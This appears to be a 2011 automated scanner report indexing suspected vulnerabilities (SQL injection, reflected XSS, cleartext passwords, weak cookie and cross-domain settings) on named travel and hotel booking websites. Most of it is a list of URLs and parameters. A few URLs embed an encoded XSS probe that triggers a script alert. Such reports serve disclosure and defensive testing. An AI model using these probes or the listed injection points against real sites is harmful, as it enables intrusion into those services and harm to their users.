XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10032011-02

RXSS Profile of Travel Industry Search Forms

Report generated by XSS.CX at Mon Oct 03 09:26:56 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://metrics.marriott.com/b/ss/marriottglobal/1/H.20.2/s45922061523888 [REST URL parameter 2]

1.2. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0 [REST URL parameter 5]

1.3. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s41395109691657 [REST URL parameter 4]

1.4. http://o.opentable.com/b/ss/otrestref/1/H.22.1/s45203784920740 [REST URL parameter 3]

1.5. http://www.opentable.com/irp/jquery/js/ScriptHandler.ashx [REST URL parameter 4]

1.6. http://www.opentable.com/jaspers-corner-tap-and-kitchen [REST URL parameter 1]

1.7. http://www.opentable.com/jscripts/ScriptHandler.ashx [REST URL parameter 2]

1.8. http://www3.hilton.com/en_US/hi/search/findhotels/results.htm [ClrSCD cookie]

2. XPath injection

3. HTTP header injection

4. Cross-site scripting (reflected)

4.1. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 2]

4.2. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 3]

4.3. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [REST URL parameter 4]

4.4. http://b3.mookie1.com/2/B3DM/DLX/1@x92 [name of an arbitrarily supplied request parameter]

4.5. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 2]

4.6. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 3]

4.7. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1009225881@x96 [REST URL parameter 4]

4.8. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 2]

4.9. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 3]

4.10. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1090617097@x96 [REST URL parameter 4]

4.11. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 2]

4.12. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 3]

4.13. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1154839602@x96 [REST URL parameter 4]

4.14. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 2]

4.15. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 3]

4.16. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1413416439@x96 [REST URL parameter 4]

4.17. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 2]

4.18. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 3]

4.19. http://b3.mookie1.com/2/RoyalCaribbean/ZAP/1795641562@x96 [REST URL parameter 4]

4.20. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 2]

4.21. http://b3.mookie1.com/2/TRACK_Royalcaribbean/RC_Retargeting2_SX_Nonsecure@Bottom3 [REST URL parameter 3]

4.22. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 2]

4.23. http://b3.mookie1.com/2/TRACK_Royalcaribbean/SiteOpt_CONV_SX_Secure@Bottom3 [REST URL parameter 3]

4.24. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 2]

4.25. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 3]

4.26. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 4]

4.27. http://b3.mookie1.com/2/royalcaribbean.com/beforeyouboard/home.do/2932448897@x95 [REST URL parameter 5]

4.28. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 2]

4.29. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 3]

4.30. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 4]

4.31. http://b3.mookie1.com/2/royalcaribbean.com/dealsandmore/hotdeals.do/0246060285@x95 [REST URL parameter 5]

4.32. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 2]

4.33. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 3]

4.34. http://b3.mookie1.com/2/royalcaribbean.com/home.do/6905219797@x95 [REST URL parameter 4]

4.35. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 2]

4.36. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 3]

4.37. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 4]

4.38. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/4350521243@x95 [REST URL parameter 5]

4.39. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 2]

4.40. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 3]

4.41. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 4]

4.42. http://b3.mookie1.com/2/royalcaribbean.com/search/processSearch.do/9110333970@x95 [REST URL parameter 5]

4.43. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mbox parameter]

4.44. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard [mboxId parameter]

4.45. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard [mbox parameter]

4.46. http://www.celebritycruises.com/explore/ships/detail.do [tab parameter]

4.47. http://www.cruises.com/ajaxjson/filterdynamic.do [changedDdl parameter]

4.48. http://www.cruises.com/results.do [name of an arbitrarily supplied request parameter]

4.49. http://www.cruisesonly.com/ajaxjson/filterdynamic.do [changedDdl parameter]

4.50. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

4.51. http://www.marriott.com/search/submitSearch.mi [clusterCode parameter]

4.52. http://www.marriott.com/search/submitSearch.mi [displayableIncentiveType_Number parameter]

4.53. http://www.marriott.com/search/submitSearch.mi [fromDate parameter]

4.54. http://www.marriott.com/search/submitSearch.mi [toDate parameter]

4.55. https://www.marriott.com/reservation/availabilitySearch.mi [displayableIncentiveType_Number parameter]

4.56. http://www.opentable.com/interim.aspx [d parameter]

4.57. http://www.opentable.com/interim.aspx [name of an arbitrarily supplied request parameter]

4.58. http://www.opentable.com/interim.aspx [p parameter]

4.59. http://www.opentable.com/interim.aspx [restref parameter]

4.60. http://www.opentable.com/interim.aspx [rid parameter]

4.61. http://www.opentable.com/interim.aspx [rtype parameter]

4.62. http://www.opentable.com/interim.aspx [t parameter]

4.63. http://www.opentable.com/opentables.aspx [d parameter]

4.64. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]

4.65. http://www.opentable.com/opentables.aspx [p parameter]

4.66. http://www.opentable.com/opentables.aspx [restref parameter]

4.67. http://www.opentable.com/opentables.aspx [rid parameter]

4.68. http://www.opentable.com/opentables.aspx [rtype parameter]

4.69. http://www.opentable.com/opentables.aspx [t parameter]

4.70. http://www.opentable.com/restaurant-search.aspx [PartySize parameter]

4.71. http://www.opentable.com/restaurant-search.aspx [ResTime parameter]

4.72. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do [REST URL parameter 4]

4.73. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do [REST URL parameter 4]

4.74. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do [REST URL parameter 4]

4.75. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do [REST URL parameter 4]

4.76. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do [REST URL parameter 4]

4.77. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do [REST URL parameter 4]

4.78. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do [REST URL parameter 4]

4.79. https://www2.ncl.com/vacations [REST URL parameter 1]

4.80. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [arrivalDate parameter]

4.81. http://www3.hilton.com/en_US/hi/search/findhotels/index.htm [departureDate parameter]

4.82. http://www3.hilton.com/es/hi/doxch.htm [name of an arbitrarily supplied request parameter]

4.83. http://www3.hilton.com/fr/hi/doxch.htm [name of an arbitrarily supplied request parameter]

4.84. http://www.celebritycruises.com/explore/ships/detail.do [JSESSIONID cookie]

4.85. http://www.celebritycruises.com/search/loadCruiseConfigurator.do [JSESSIONID cookie]

4.86. http://www.celebritycruises.com/search/vacationSearchResults.do [JSESSIONID cookie]

4.87. http://www.opentable.com/interim.aspx [lsCKE cookie]

4.88. http://www.opentable.com/interim.aspx [lsCKE cookie]

4.89. http://www.opentable.com/opentables.aspx [lsCKE cookie]

4.90. http://www.opentable.com/opentables.aspx [lsCKE cookie]

4.91. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

4.92. http://www.opentable.com/rest_profile.aspx [lsCKE cookie]

4.93. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

4.94. http://www.opentable.com/restaurant-search.aspx [lsCKE cookie]

5. Flash cross-domain policy

5.1. http://as00.estara.com/crossdomain.xml

5.2. http://dev.virtualearth.net/crossdomain.xml

5.3. http://ecn.dev.virtualearth.net/crossdomain.xml

5.4. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.5. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.6. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.7. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.8. http://g-pixel.invitemedia.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://marriottinternationa.tt.omtrdc.net/crossdomain.xml

5.11. http://metrics.marriott.com/crossdomain.xml

5.12. http://o.opentable.com/crossdomain.xml

5.13. http://opentable.tt.omtrdc.net/crossdomain.xml

5.14. http://opentable.ugc.bazaarvoice.com/crossdomain.xml

5.15. http://reviews.opentable.com/crossdomain.xml

5.16. https://www2.ncl.com/crossdomain.xml

5.17. http://www.opentable.com/crossdomain.xml

5.18. https://www201.americanexpress.com/crossdomain.xml

5.19. http://cache.marriott.com/crossdomain.xml

5.20. http://www.marriott.com/crossdomain.xml

5.21. https://www.marriott.com/crossdomain.xml

5.22. http://www.marriottvacationclub.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://dev.virtualearth.net/clientaccesspolicy.xml

6.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

6.3. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.4. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.5. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.6. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.7. http://metrics.marriott.com/clientaccesspolicy.xml

6.8. http://o.opentable.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.kimptonhotels.com/

7.2. http://www.kimptonhotels.com/intouch/KIT_overview.aspx

7.3. http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx

7.4. http://www.kimptonhotels.com/restaurants/restaurants.aspx

7.5. http://www1.hilton.com/en_US/hi/customersupport/feedback.do

7.6. http://www1.hilton.com/en_US/hi/customersupport/index.do

7.7. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do

7.8. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

7.9. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

7.10. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

7.11. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

7.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

7.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

7.14. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

7.15. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

7.16. http://www1.hilton.com/en_US/hi/index.do

7.17. http://www1.hilton.com/en_US/hi/index.do

7.18. http://www1.hilton.com/en_US/hi/sitemap/index.do

8. SSL cookie without secure flag set

8.1. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

8.2. https://www.cruisesonly.com/bcss/default.asp

8.3. https://www.marriott.com/!crd_prm!.!cm

8.4. https://www.marriott.com/default.mi

8.5. https://www.marriott.com/reservation/availability.mi

8.6. https://www.marriott.com/reservation/availabilitySearch.mi

8.7. https://www.marriott.com/reservation/cleanSession.mi

8.8. https://www.marriott.com/reservation/expiredSession.mi

8.9. https://www.marriott.com/reservation/rateListMenu.mi

8.10. https://www2.ncl.com/vacations

9. Session token in URL

9.1. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

9.2. http://hiltonworldwide.hilton.com/en/ww/ourbestrates/claimform.jhtml

9.3. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage

9.4. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

9.5. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard

9.6. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

9.7. https://secure.hilton.com/en/hhonors/signup/hhonors_enroll.jhtml

9.8. https://secure.hilton.com/en/hi/login/login.jhtml

9.9. https://secure.hilton.com/en/hi/login/login.jhtml

9.10. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

9.11. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

9.12. https://secure3.hilton.com/en_US/hi/reservation/book.htm

9.13. https://secure3.hilton.com/en_US/hi/reservation/book.htm

9.14. http://vdassets.bitgravity.com/embeds/videos/54834a058f00d/2adf12c322cf26d8daa82578343bfb02-ncl_default_hq.json

9.15. http://www.hilton.com/en/hi/brand/about.jhtml

9.16. http://www.hilton.com/en/hi/info/site_usage.jhtml

9.17. http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html

9.18. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html

9.19. http://www1.hilton.com/en_US/hh/home_index.do

9.20. http://www1.hilton.com/en_US/hi/customersupport/index.do

9.21. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

9.22. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

9.23. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

9.24. http://www1.hilton.com/en_US/hi/index.do

9.25. http://www1.hilton.com/en_US/hi/sitemap/index.do

9.26. http://www3.hilton.com/en_US/ch/doxch.htm

9.27. http://www3.hilton.com/en_US/dt/doxch.htm

9.28. http://www3.hilton.com/en_US/es/doxch.htm

9.29. http://www3.hilton.com/en_US/gi/doxch.htm

9.30. http://www3.hilton.com/en_US/hh/doxch.htm

9.31. http://www3.hilton.com/en_US/hi/doxch.htm

9.32. http://www3.hilton.com/en_US/hp/doxch.htm

9.33. http://www3.hilton.com/en_US/ht/doxch.htm

9.34. http://www3.hilton.com/en_US/hw/doxch.htm

9.35. http://www3.hilton.com/en_US/wa/doxch.htm

9.36. http://www3.hilton.com/es/hi/doxch.htm

9.37. http://www3.hilton.com/fr/hi/doxch.htm

10. SSL certificate

10.1. https://secure2.hilton.com/

10.2. https://wwwa.applyonlinenow.com/

10.3. https://secure.hilton.com/

10.4. https://secure3.hilton.com/

10.5. https://www.marriott.com/

10.6. https://www.marriottregistry.com/

10.7. https://www2.ncl.com/

10.8. https://www201.americanexpress.com/

11. Cookie scoped to parent domain

11.1. http://www.royalcaribbean.com/

11.2. http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm

11.3. http://b.scorecardresearch.com/p

11.4. http://bstats.adbrite.com/adserver/behavioral-data/0

11.5. http://id.google.com/verify/EAAAAMspK6l-6mI9iMP5vGnYNYo.gif

11.6. http://leadback.advertising.com/adcedge/lb

11.7. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0

11.8. http://pixel.traveladvertising.com/Live/Pixel.aspx

11.9. http://r.turn.com/r/beacon

11.10. http://servedby.flashtalking.com/segment/modify/ah3

11.11. http://servedby.flashtalking.com/segment/modify/ahr

11.12. http://tracker.marinsm.com/tp

11.13. https://www.cruisesonly.com/bcss/default.asp

11.14. http://www.opentable.com/

11.15. http://www.opentable.com/frontdoor/default.aspx

11.16. http://www.opentable.com/info/aboutus.aspx

11.17. http://www.opentable.com/interim.aspx

11.18. http://www.opentable.com/jaspers-corner-tap-and-kitchen

11.19. http://www.opentable.com/opentables.aspx

11.20. http://www.opentable.com/restaurant-search.aspx

11.21. http://www2.ncl.com/

11.22. http://www2.ncl.com/about/careers/overview

11.23. http://www2.ncl.com/about/contact-us

11.24. http://www2.ncl.com/about/environmental-commitment

11.25. http://www2.ncl.com/about/staying-connected-sea-internet-access

11.26. http://www2.ncl.com/cruise-destinations

11.27. http://www2.ncl.com/destination/canada_new_engl/hotel

11.28. http://www2.ncl.com/destination/canada_new_engl/ports/map

11.29. http://www2.ncl.com/destination/canada_new_engl/questions

11.30. http://www2.ncl.com/destination/canada_new_engl/stories

11.31. http://www2.ncl.com/destination/canada_new_engl/vacations

11.32. http://www2.ncl.com/destination/caribbean/excursions

11.33. http://www2.ncl.com/destination/caribbean/hotel

11.34. http://www2.ncl.com/destination/caribbean/overview

11.35. http://www2.ncl.com/destination/caribbean/ports/map

11.36. http://www2.ncl.com/destination/caribbean/questions

11.37. http://www2.ncl.com/destination/caribbean/stories

11.38. http://www2.ncl.com/destination/caribbean/vacations

11.39. http://www2.ncl.com/destination/europe/excursions

11.40. http://www2.ncl.com/destination/europe/hotel

11.41. http://www2.ncl.com/destination/europe/overview

11.42. http://www2.ncl.com/destination/europe/ports/map

11.43. http://www2.ncl.com/destination/europe/questions

11.44. http://www2.ncl.com/destination/europe/stories

11.45. http://www2.ncl.com/destination/europe/vacations

11.46. http://www2.ncl.com/destination/hawaii/excursions

11.47. http://www2.ncl.com/destination/hawaii/hotel

11.48. http://www2.ncl.com/destination/hawaii/overview

11.49. http://www2.ncl.com/destination/hawaii/ports/map

11.50. http://www2.ncl.com/destination/hawaii/questions

11.51. http://www2.ncl.com/destination/hawaii/stories

11.52. http://www2.ncl.com/destination/hawaii/vacations

11.53. http://www2.ncl.com/destination/pacific_coastal/excursions

11.54. http://www2.ncl.com/destination/pacific_coastal/hotel

11.55. http://www2.ncl.com/destination/pacific_coastal/overview

11.56. http://www2.ncl.com/destination/pacific_coastal/ports/map

11.57. http://www2.ncl.com/destination/pacific_coastal/questions

11.58. http://www2.ncl.com/destination/pacific_coastal/stories

11.59. http://www2.ncl.com/destination/pacific_coastal/vacations

11.60. http://www2.ncl.com/destination/panama_canal/excursions

11.61. http://www2.ncl.com/destination/panama_canal/hotel

11.62. http://www2.ncl.com/destination/panama_canal/overview

11.63. http://www2.ncl.com/destination/panama_canal/ports/map

11.64. http://www2.ncl.com/destination/panama_canal/questions

11.65. http://www2.ncl.com/destination/panama_canal/stories

11.66. http://www2.ncl.com/faq

11.67. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts

11.68. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview

11.69. http://www2.ncl.com/freestyle-cruise/cruise-rewards

11.70. http://www2.ncl.com/freestyle-cruise/freestyle-accommodations

11.71. http://www2.ncl.com/freestyle-cruise/freestyle-dining

11.72. http://www2.ncl.com/freestyle-cruise/freestyle-family-fun/overview

11.73. http://www2.ncl.com/freestyle-cruise/golf/overview

11.74. http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages

11.75. http://www2.ncl.com/freestyle-cruise/nickelodeon

11.76. http://www2.ncl.com/freestyle-cruise/onboard-experience

11.77. http://www2.ncl.com/freestyle-cruise/overview

11.78. http://www2.ncl.com/freestyle-cruise/spa

11.79. http://www2.ncl.com/freestyle-cruise/spa-sports-and-fitness

11.80. http://www2.ncl.com/ncl_inside_scoop

11.81. http://www2.ncl.com/sitemap

11.82. https://www2.ncl.com/vacations

12. Cookie without HttpOnly flag set

12.1. http://vacations.rooms.com/wthrooms/CPCSS

12.2. http://vacations.rooms.com/wthrooms/CPGateway

12.3. http://vacations.rooms.com/wthrooms/CPMerchandisingPage

12.4. http://vacations.rooms.com/wthrooms/CPScreenMessageCSS

12.5. http://vacations.rooms.com/wthrooms/HotelDetails

12.6. http://vacations.rooms.com/wthrooms/Search

12.7. http://www.cruisesonly.com/cs/default.asp

12.8. http://www.hilton.com/

12.9. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html

12.10. http://www.rooms.com/favicon.ico

12.11. http://www.royalcaribbean.com/

12.12. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/dining.do

12.13. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do

12.14. http://www1.hilton.com/en_US/hi/index.do

12.15. http://www1.hilton.com/en_US/hi/sitemap/index.do

12.16. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry

12.17. http://b.scorecardresearch.com/p

12.18. http://bstats.adbrite.com/adserver/behavioral-data/0

12.19. http://ctix8.cheaptickets.com/dcsrbjuh3vz5bde9exdeyiy5l_8c1r/dcs.gif

12.20. http://leadback.advertising.com/adcedge/lb

12.21. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/mbox/standard

12.22. http://marriottinternationa.tt.omtrdc.net/m2/marriottinternationa/sc/standard

12.23. http://o.opentable.com/b/ss/otcom/1/H.22.1--NS/0

12.24. http://opentable.tt.omtrdc.net/m2/opentable/mbox/standard

12.25. http://pixel.traveladvertising.com/Live/Pixel.aspx

12.26. http://r.turn.com/r/beacon

12.27. http://servedby.flashtalking.com/segment/modify/ah3

12.28. http://servedby.flashtalking.com/segment/modify/ahr

12.29. http://statse.webtrendslive.com/DCSKIoc2rNH8I36lrbe6wexE5_5B9O/dcs.gif

12.30. http://statse.webtrendslive.com/dcsu0n3ra10000g4qrzwkeqml_4q6w/dcs.gif

12.31. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/dcs.gif

12.32. http://statse.webtrendslive.com/dcsx8czs1erp17368wkcsn8pc_9z2q/njs.gif

12.33. http://tracker.marinsm.com/tp

12.34. http://www.cruises.com/

12.35. http://www.cruises.com/ajaxhtml/filterdynamic.do

12.36. http://www.cruises.com/ajaxjson/filterdynamic.do

12.37. http://www.cruises.com/cs/default.asp

12.38. http://www.cruises.com/i/shadow.png

12.39. http://www.cruises.com/idle.do

12.40. http://www.cruises.com/mailing.do

12.41. http://www.cruises.com/promotion/balcony-suite-cruises.do

12.42. http://www.cruises.com/promotion/weekend-cruises.do

12.43. http://www.cruises.com/results.do

12.44. http://www.cruises.com/sc.do

12.45. http://www.cruises.com/vistracker.do

12.46. http://www.cruisesonly.com/ajaxhtml/filterdynamic.do

12.47. http://www.cruisesonly.com/ajaxjson/filterdynamic.do

12.48. http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp

12.49. http://www.cruisesonly.com/lib/javascript/ajax/logerror.js

12.50. http://www.cruisesonly.com/promotion/bermuda-cruises.do

12.51. http://www.cruisesonly.com/sc.do

12.52. http://www.cruisesonly.com/sharedwidgets/Caribbean.do

12.53. https://www.cruisesonly.com/bcss/default.asp

12.54. http://www.marriott.com/!crd_prm!.!cm

12.55. http://www.marriott.com/default.mi

12.56. http://www.marriott.com/search/a

12.57. http://www.marriott.com/search/findHotels.mi

12.58. http://www.marriott.com/search/submitSearch.mi

12.59. https://www.marriott.com/!crd_prm!.!cm

12.60. https://www.marriott.com/default.mi

12.61. https://www.marriott.com/reservation/availability.mi

12.62. https://www.marriott.com/reservation/availabilitySearch.mi

12.63. https://www.marriott.com/reservation/cleanSession.mi

12.64. https://www.marriott.com/reservation/expiredSession.mi

12.65. https://www.marriott.com/reservation/rateListMenu.mi

12.66. http://www.marriottvacationclub.com/index.shtml

12.67. http://www.opentable.com/

12.68. http://www.opentable.com/frontdoor/default.aspx

12.69. http://www.opentable.com/info/aboutus.aspx

12.70. http://www.opentable.com/interim.aspx

12.71. http://www.opentable.com/jaspers-corner-tap-and-kitchen

12.72. http://www.opentable.com/opentables.aspx

12.73. http://www.opentable.com/restaurant-search.aspx

12.74. http://www1.hilton.com/

12.75. http://www1.hilton.com/doxch.do

12.76. http://www1.hilton.com/en_US/common/img/ui-bg_highlight-hard_100_f9f9f9_1x100.png

12.77. http://www1.hilton.com/en_US/hh/home_index.do

12.78. http://www1.hilton.com/en_US/hi/customersupport/feedback.do

12.79. http://www1.hilton.com/en_US/hi/customersupport/index.do

12.80. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do

12.81. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do

12.82. http://www1.hilton.com/en_US/hi/homeNew.do

12.83. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

12.84. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

12.85. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

12.86. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

12.87. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

12.88. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts3e697%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Edc3906d35ca/a

12.89. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts8520e%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Ee41feaea175/a

12.90. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/photoGallery.do

12.91. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/res-widget-to-gw.do

12.92. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH45db3%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0f6e1a8e424/a

12.93. http://www1.hilton.com/ts/en_US/hi/jsp/inc_home_flash.xml

12.94. http://www2.ncl.com/

12.95. http://www2.ncl.com/about/careers/overview

12.96. http://www2.ncl.com/about/contact-us

12.97. http://www2.ncl.com/about/environmental-commitment

12.98. http://www2.ncl.com/about/staying-connected-sea-internet-access

12.99. http://www2.ncl.com/cruise-destinations

12.100. http://www2.ncl.com/destination/canada_new_engl/hotel

12.101. http://www2.ncl.com/destination/canada_new_engl/ports/map

12.102. http://www2.ncl.com/destination/canada_new_engl/questions

12.103. http://www2.ncl.com/destination/canada_new_engl/stories

12.104. http://www2.ncl.com/destination/canada_new_engl/vacations

12.105. http://www2.ncl.com/destination/caribbean/excursions

12.106. http://www2.ncl.com/destination/caribbean/hotel

12.107. http://www2.ncl.com/destination/caribbean/overview

12.108. http://www2.ncl.com/destination/caribbean/ports/map

12.109. http://www2.ncl.com/destination/caribbean/questions

12.110. http://www2.ncl.com/destination/caribbean/stories

12.111. http://www2.ncl.com/destination/caribbean/vacations

12.112. http://www2.ncl.com/destination/europe/excursions

12.113. http://www2.ncl.com/destination/europe/hotel

12.114. http://www2.ncl.com/destination/europe/overview

12.115. http://www2.ncl.com/destination/europe/ports/map

12.116. http://www2.ncl.com/destination/europe/questions

12.117. http://www2.ncl.com/destination/europe/stories

12.118. http://www2.ncl.com/destination/europe/vacations

12.119. http://www2.ncl.com/destination/hawaii/excursions

12.120. http://www2.ncl.com/destination/hawaii/hotel

12.121. http://www2.ncl.com/destination/hawaii/overview

12.122. http://www2.ncl.com/destination/hawaii/ports/map

12.123. http://www2.ncl.com/destination/hawaii/questions

12.124. http://www2.ncl.com/destination/hawaii/stories

12.125. http://www2.ncl.com/destination/hawaii/vacations

12.126. http://www2.ncl.com/destination/pacific_coastal/excursions

12.127. http://www2.ncl.com/destination/pacific_coastal/hotel

12.128. http://www2.ncl.com/destination/pacific_coastal/overview

12.129. http://www2.ncl.com/destination/pacific_coastal/ports/map

12.130. http://www2.ncl.com/destination/pacific_coastal/questions

12.131. http://www2.ncl.com/destination/pacific_coastal/stories

12.132. http://www2.ncl.com/destination/pacific_coastal/vacations

12.133. http://www2.ncl.com/destination/panama_canal/excursions

12.134. http://www2.ncl.com/destination/panama_canal/hotel

